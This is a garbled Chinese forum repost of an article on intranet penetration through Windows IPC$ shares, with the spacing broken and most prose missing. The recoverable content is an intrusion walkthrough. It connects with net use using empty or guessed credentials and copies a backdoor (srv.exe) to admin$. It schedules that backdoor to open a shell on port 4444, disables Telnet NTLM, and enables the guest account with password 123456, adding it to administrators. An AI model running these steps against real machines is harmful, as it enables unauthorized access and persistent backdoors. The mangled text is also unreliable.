[21190] 2020-08-12_内网渗透之IPC$入侵

文档创建者:s7ckTeam
浏览次数:3
最后更新:2025-01-18
2020-08-12_内网渗透之IPC$入侵 I P C $ L e m o n S e c   2 0 2 0 - 0 8 - 1 2 P C $ I P C $ I P C $ I P C $ I P C $ 1 . I P C $ 2 . 3 . 4 . 访 / 5 . I P C $ 6 . ( 1 ) ( 2 ) ( 3 ) ( 4 ) ( 5 ) I P C $ ( I n t e r n e t   P r o c e s s   C o n n e c t i o n ) , 使 I P C $ , 1 .   1 3 9 , 4 4 5                   i p c $ 访 ; 1 3 9 n e t b i o s , 1 3 9 , 4 4 5 ( w i n 2 0 0 0 ) / 访 , , i p c $ 1 . N T . 2 . i p c $ 3 . 1 3 9 4 4 5 . 4 . . 5 . . 1 . 5 访   使 2 . 5 1 W i n d o w s     :   3 . 5 3   i p l a n m a n s e r v e r 4 . 6 7   l a n m a n w o r k s t a t i o n i p c $ 5 . 1 2 1 9   i p c $ 6 . 1 3 2 6   7 . 1 7 9 2   N e t L o g o n 8 . 2 2 4 2   n e t   u s e   1 2 7 . 0 . 0 . 1 i p c $   " "   / u s e r : " " n e t   u s e   1 2 7 . 0 . 0 . 1 i p c $   " p a s s w o r d "   / u s e r : " u s e r n a m e " n e t   u s e   z :   1 2 7 . 0 . 0 . 1 c $   " "   / u s e r : " "     ( c z ) n e t   u s e   z :   1 2 7 . 0 . 0 . 1 c $       # 访 n e t   u s e   c :   / d e l           c n e t   u s e   *   / d e l             , y n e t   u s e   1 2 7 . 0 . 0 . 1 i p c $   / d e l C : > n e t   u s e   1 2 7 . 0 . 0 . 1 I P C $   " "   / u s e r : " a d m i n t i t r a t o r s "   a d m i n i s t r a t o r s " " I P 1 2 7 . 0 . 0 . 1 " " a d m i n i s t r a t o r s C : > c o p y   s r v . e x e   1 2 7 . 0 . 0 . 1 a d m i n $ s r v . e x e T o o l s $ a d m i n c : w i n n t s y s t e m 3 2 使 c $ d $ C D C : > n e t   t i m e   1 2 7 . 0 . 0 . 1   1 2 7 . 0 . 0 . 1     2 0 1 9 / 2 / 8     1 1 : 0 0 C : > a t   1 2 7 . 0 . 0 . 1   1 1 : 0 5   s r v . e x e   a t s r v . e x e
( 6 ) ( 7 ) ( 8 ) ( 9 ) ( 1 0 ) ( 1 1 ) ( 1 2 ) 7 . I P C $ 8 . n e t s t a t 使 C : > n e t   t i m e   1 2 7 . 0 . 0 . 1 1 2 7 . 0 . 0 . 1     2 0 1 9 / 2 / 8     1 1 : 0 5 s r v . e x e C : > t e l n e t   1 2 7 . 0 . 0 . 1   4 4 4 4   T e l n e t 4 4 4 4 T e l n e t 2 3 使 s r v . e x e 4 4 4 4 S h e l l T e l n e t s r v . e x e T e l n e t n t l m C : > c o p y   n t l m . e x e   1 2 7 . 0 . 0 . 1 a d m i n $ C o p y n t l m . e x e n t l m . e x e T o o l s C : W I N N T s y s t e m 3 2 > n t l m   n t l m C : W I N N T s y s t e m 3 2 > n t l m " D O N E " 使 " n e t   s t a r t   t e l n e t " T e l n e t T e l n e t   1 2 7 . 0 . 0 . 1 D O S , g u e s t C : > n e t   u s e r   g u e s t   / a c t i v e : y e s G u e s t C : > n e t   u s e r   g u e s t   1 2 3 4 5 6 G u e s t 1 2 3 4 5 6 , C : > n e t   l o c a l g r o u p   a d m i n i s t r a t o r s   g u e s t   / a d d   G u e s t A d m i n i s t r a t o r ^ _ ^ ( g u e s t g u e s t 访 ) n e t   s h a r e               # n e t   v i e w   I P       # t a r g e t n e t s t a t   - A   I P       # t a r g e t u s e r n e t s t a t   - a n o   |   f i n d s t r   " p o r t "     # P I D t a s k l i s t   |   f i n d s t r   " P I D "               # b m j o k e r h t t p s : / / w w w . c n b l o g s . c o m / b m j o k e r / p / 1 0 3 5 5 9 3 4 . h t m l   B Y - N C - S A  
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则